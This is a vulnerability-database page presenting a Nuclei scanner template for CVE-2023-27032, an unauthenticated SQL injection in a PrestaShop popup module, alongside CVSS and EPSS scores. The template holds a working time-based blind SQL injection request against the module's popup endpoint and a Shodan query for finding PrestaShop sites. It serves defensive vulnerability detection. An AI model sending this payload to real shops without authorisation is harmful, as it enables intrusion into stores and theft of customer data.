Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2023-27032
HistoryMar 16, 2024 - 5:23 p.m.

PrestaShop AdvancedPopupCreator - SQL Injection

2024-03-1617:23:48
ProjectDiscovery
github.com
24
prestashop
advancedpopupcreator
sqli
cve
cve2023
sqlinjection

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.018

Percentile

88.3%

JSON
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.

id: CVE-2023-27032

info:
  name: PrestaShop AdvancedPopupCreator - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
  reference:
    - https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
    - https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27032
    cwe-id: CWE-89
    epss-score: 0.01979
    epss-percentile: 0.88753
    cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: idnovate
    product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter"
    framework: prestashop
    shodan-query: "http.component:\"prestashop\""
  tags: cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout 20s
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}

    matchers:
      - type: dsl
        dsl:
          - duration_2>=6
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body, 'popups','hasError')
        condition: and

    extractors:
      - type: regex
        name: time
        group: 1
        regex:
          - ',"time":([0-9]+),'
        internal: true

      - type: regex
        name: token
        group: 1
        regex:
          - ',"static_token":"([0-9a-z]+)",'
        internal: true
# digest: 490a004630440220505e538de0a7417f495151e7828e4e9c1c60805ab390374202dae077362ff09a02201d031f84949b5d962b16a57aac4c5ab5c30b7785284dfd82a4916a01a3c318bc:922c64590222798bb761d5b6d8e72950

Related

prion 1
cve 1
cvelist 1
nvd 1
prion
prion
Sql injection
2023-04-12 14:15:00
cve
cve
CVE-2023-27032
2023-04-12 14:15:07
cvelist
cvelist
CVE-2023-27032
2023-04-12 00:00:00
nvd
nvd
CVE-2023-27032
2023-04-12 14:15:07

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.018

Percentile

88.3%

JSON
Related for NUCLEI:CVE-2023-27032
prion1cve1cvelist1nvd1